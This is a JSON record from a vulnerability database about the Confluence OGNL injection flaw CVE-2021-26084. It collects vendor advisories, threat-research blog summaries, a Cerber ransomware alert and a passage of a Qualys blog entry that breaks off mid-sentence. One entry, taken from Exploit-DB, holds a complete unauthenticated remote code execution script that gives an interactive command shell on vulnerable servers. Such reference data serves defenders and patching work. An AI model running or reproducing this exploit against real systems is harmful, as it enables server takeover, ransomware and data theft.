"trendmicroblog": [{"lastseen": "2021-09-21T16:35:19", "description": "Recently, we discovered that the cryptomining trojan z0Miner has been taking advantage of the Atlassian\u2019s Confluence remote code execution (RCE) vulnerability assigned as CVE-2021-26084, which was disclosed by Atlassian in August.", "cvss3": {}, "published": "2021-09-21T00:00:00", "type": "trendmicroblog", "title": "Cryptominer z0Miner Uses Newly Discovered Vulnerability CVE-2021-26084 to Its Advantage", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-21T00:00:00", "id": "TRENDMICROBLOG:1333714193E63A3E616DE66054C5D640", "href": "https://www.trendmicro.com/en_us/research/21/i/cryptominer-z0miner-uses-newly-discovered-vulnerability-cve-2021.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-10T18:37:14", 
"description": "We look into campaigns that exploit the following server vulnerabilities: CVE-2021-26084, CVE-2020-14882, CVE-2020-14750, and CVE-2020-14883.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-18T00:00:00", "type": "trendmicroblog", "title": "Tracking CVE-2021-26084 and Other Server-Based Vulnerability Exploits via Trend Micro Cloud One and Trend Micro Vision One", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-14883", "CVE-2021-26084"], "modified": "2021-10-18T00:00:00", "id": "TRENDMICROBLOG:608F794950B54766A75ABA93823701D0", "href": "https://www.trendmicro.com/en_us/research/21/j/tracking-cve-2021-26084-and-other-server-vulnerability-exploits.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-18T14:36:36", "description": "We look into campaigns that exploit the following server vulnerabilities: CVE-2021-26084, CVE-2020-14882, CVE-2020-14750, and CVE-2020-14883.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-18T00:00:00", "type": "trendmicroblog", "title": "Tracking CVE-2021-26084 and Other Server-Based Vulnerability Exploits via Trend Micro Cloud One and Trend Micro Vision One", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-14883", "CVE-2021-26084"], "modified": "2021-10-18T00:00:00", "id": "TRENDMICROBLOG:C00F7F935E0D1EAD0509B4C376B20A1F", "href": "https://www.trendmicro.com/en_us/research/21/j/tracking-cve-2021-26084-and-other-server-vulnerability-exploits.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "atlassian": [{"lastseen": "2022-02-09T06:10:34", "description": "*This vulnerability is being actively exploited in the wild. Affected servers should be patched immediately.*\r\n\r\nAn OGNL injection vulnerability exists that allows an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance.\r\n\r\nThe CVE ID is CVE-2021-26084.\r\nh4. 
Acknowledgements\r\n\r\nThe issue was discovered by Benny Jacob (SnowyOwl) via the Atlassian public bug bounty program.\r\n\r\nThe affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\r\n\r\n*Affected versions:*\r\n * version < 6.13.23\r\n * 6.14.0 \u2264 version < 7.4.11\r\n * 7.5.0 \u2264 version < 7.11.5\r\n * 7.12.0 \u2264 version < 7.12.5\r\n\r\n*Fixed versions:*\r\n * 6.13.23\r\n * 7.4.11\r\n * 7.11.6\r\n * 7.12.5\r\n * 7.13.0 \u00a0\r\n\r\n\u00a0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-27T05:13:48", "type": "atlassian", "title": "Confluence Server Webwork OGNL injection - CVE-2021-26084", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-08T22:26:32", "id": "CONFSERVER-67940", "href": "https://jira.atlassian.com/browse/CONFSERVER-67940", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:44:44", "description": "*This vulnerability is being actively exploited in the wild. 
Affected servers should be patched immediately.*\r\n\r\nAn OGNL injection vulnerability exists that allows an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance.\r\n\r\nThe CVE ID is CVE-2021-26084.\r\nh4. Acknowledgements\r\n\r\nThe issue was discovered by Benny Jacob (SnowyOwl) via the Atlassian public bug bounty program.\r\n\r\nThe affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\r\n\r\n*Affected versions:*\r\n * version < 6.13.23\r\n * 6.14.0 \u2264 version < 7.4.11\r\n * 7.5.0 \u2264 version < 7.11.5\r\n * 7.12.0 \u2264 version < 7.12.5\r\n\r\n*Fixed versions:*\r\n * 6.13.23\r\n * 7.4.11\r\n * 7.11.6\r\n * 7.12.5\r\n * 7.13.0 \u00a0\r\n\r\n\u00a0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-27T05:13:48", "type": "atlassian", "title": "Confluence Server Webwork OGNL injection - CVE-2021-26084", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-22T01:29:22", "id": "ATLASSIAN:CONFSERVER-67940", 
"href": "https://jira.atlassian.com/browse/CONFSERVER-67940", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-05-13T17:35:56", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T00:00:00", "type": "exploitdb", "title": "Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-26084", "CVE-2021-26084"], "modified": "2021-09-01T00:00:00", "id": "EDB-ID:50243", "href": "https://www.exploit-db.com/exploits/50243", "sourceData": "# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)\r\n# Date: 01/09/2021\r\n# Exploit Author: h3v0x\r\n# Vendor Homepage: https://www.atlassian.com/\r\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\r\n# Version: All < 7.12.x versions before 7.12.5\r\n# Tested on: Linux Distros \r\n# CVE : CVE-2021-26084\r\n\r\n#!/usr/bin/python3\r\n\r\n# References: \r\n# 
https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\r\n# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport optparse\r\n\r\nparser = optparse.OptionParser()\r\nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help=\"Base target host: http://confluencexxx.com\")\r\nparser.add_option('-p', '--path', action=\"store\", dest=\"path\", help=\"Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x\")\r\n\r\noptions, args = parser.parse_args()\r\nsession = requests.Session()\r\n\r\nurl_vuln = options.url\r\nendpoint = options.path\r\n\r\nif not options.url or not options.path:\r\n\r\n print('[+] Specify an url target')\r\n print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x')\r\n print('[+] Example help usage: exploit.py -h')\r\n exit()\r\n\r\n\r\ndef banner():\r\n\r\n print('---------------------------------------------------------------')\r\n print('[-] Confluence Server Webwork OGNL injection')\r\n print('[-] CVE-2021-26084')\r\n print('[-] https://github.com/h3v0x')\r\n print('--------------------------------------------------------------- \\n')\r\n\r\n\r\ndef cmdExec():\r\n\r\n while True:\r\n cmd = input('> ')\r\n xpl_url = url_vuln + endpoint\r\n xpl_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"Accept-Encoding\": \"gzip, deflate\"}\r\n xpl_data = {\"queryString\": \"aaaaaaaa\\\\u0027+{Class.forName(\\\\u0027javax.script.ScriptEngineManager\\\\u0027).newInstance().getEngineByName(\\\\u0027JavaScript\\\\u0027).\\\\u0065val(\\\\u0027var isWin = java.lang.System.getProperty(\\\\u0022os.name\\\\u0022).toLowerCase().contains(\\\\u0022win\\\\u0022); var cmd = new 
java.lang.String(\\\\u0022\"+cmd+\"\\\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\\\u0022cmd.exe\\\\u0022, \\\\u0022/c\\\\u0022, cmd); } else{p.command(\\\\u0022bash\\\\u0022, \\\\u0022-c\\\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\\\u0022\\\\u0022; var output = \\\\u0022\\\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\\\u0027)}+\\\\u0027\"}\r\n rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data)\r\n\r\n soup = BeautifulSoup(rawHTML.text, 'html.parser')\r\n queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']\r\n print(queryStringValue)\r\n\r\n\r\nbanner()\r\ncmdExec()", "sourceHref": "https://www.exploit-db.com/download/50243", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2021-12-14T15:20:51", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/12/Cerber-targeting-organizations-with-publicly_TA202158.pdf>)[](<https://docs.google.com/viewer?url=https%3A%2F%2Fwww.hivepro.com%2Fwp-content%2Fuploads%2F2021%2F11%2FMicrosoft-could-not-patch-this-vulnerability_TA202150-1.pdf&embedded=true&chrome=false&dov=1> \"View this pdf file\" )\n\nCerber, ransomware that mysteriously vanished in 2019, has reappeared with a new encryption. 
The new cerber includes fresh source code and makes use of the new library Crypto+++, whereas the previous form made use of Windows CryptoAPI libraries.\n\nCerber is utilizing the following two vulnerabilities: -CVE-2021-26084: a remote code execution vulnerability that allows an attacker to execute arbitrary code in Atlassian Confluence Servers and Datacenters versions 6.13.22, 6.14.0-7.4.10, 7.5.0-7.11.5, 7.12.0-7.12.4. It has been fixed in versions 6.13.23, 7.4.11, 7.11.6, and 7.12.5. -CVE-2021-22205: GitHub Gitlab community and enterprise versions 11.9.0-13.8 are affected by a command execution vulnerability that can be exploited by uploading an image that runs via the ExifTool of GitLab Workhorse and achieving remote code execution via a specially designed file. It has been fixed in version 13.9.\n\nThe new Cerber ransomware uses either of the two vulnerabilities mentioned above and then enters victims' systems and encrypts their files. Cerber ransomware places the ransom note in the file **__$$RECOVERY_README$$__.html**, and all the encrypted files have an extension of .locked.\n\nOrganizations can patch both vulnerabilities by upgrading their systems to fixed versions.\n\nThe TTP's used by **Cerber** includes:\n\nTA0002 - Execution\n\nT1059 - Command and Scripting Interpreter\n\nT1059.003 - Command and Scripting Interpreter: Windows Command Shell\n\nTA0007 - Discovery\n\nT1012 - Query Registry\n\nT1082 - System Information Discovery\n\n#### Vulnerability Details\n\n\n\n#### Indicators of Compromise(IoCs)\n\n\n\n#### Patch Links\n\n<https://jira.atlassian.com/browse/CONFSERVER-67940>\n\n#### 
References\n\n<https://gitlab.com/gitlab-org/gitlab/-/issues/327121>\n\n<https://packetstormsecurity.com/files/164768/GitLab-Unauthenticated-Remote-ExifTool-Command-Injection.html>\n\n<https://packetstormsecurity.com/files/164013/Confluence-Server-7.12.4-OGNL-Injection-Remote-Code-Execution.html>\n\n<https://otx.alienvault.com/pulse/61af78ee529faac40b2de15e/related>\n\n<https://app.any.run/tasks/c59f562e-4a61-459c-b0a3-9890c412b0ea/>\n\n<https://www.bleepingcomputer.com/news/security/new-cerber-ransomware-targets-confluence-and-gitlab-servers/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T13:50:15", "type": "hivepro", "title": "Cerber targeting organizations with publicly available exploits", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205", "CVE-2021-26084"], "modified": "2021-12-14T13:50:15", "id": "HIVEPRO:E9C63D0D70D3232F21940B33FC205340", "href": "https://www.hivepro.com/cerber-targeting-organizations-with-publicly-available-exploits/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2022-05-11T05:29:14", "description": 
"_The U.S. Cybersecurity & Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report\u2019s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment._\n\nThe Cybersecurity & Infrastructure Security Agency (CISA) releases [detailed alerts](<https://www.cisa.gov/uscert/ncas/alerts>) of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights into the type, nature, and vendor product affected, as well as recommended mitigations that enterprise IT/security professionals can take to reduce their risk.\n\nTo that end, CISA has released its [2021 Top Routinely Exploited Vulnerabilities Report](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>). It provides in-depth details of each exploited CVE, including which threat actors aggressively targeted both public and private sector organizations worldwide. It also provides mitigation guidance for all the top vulnerabilities.\n\nOf special interest in the report is this key finding by CISA:\n\n_Globally, in 2021, malic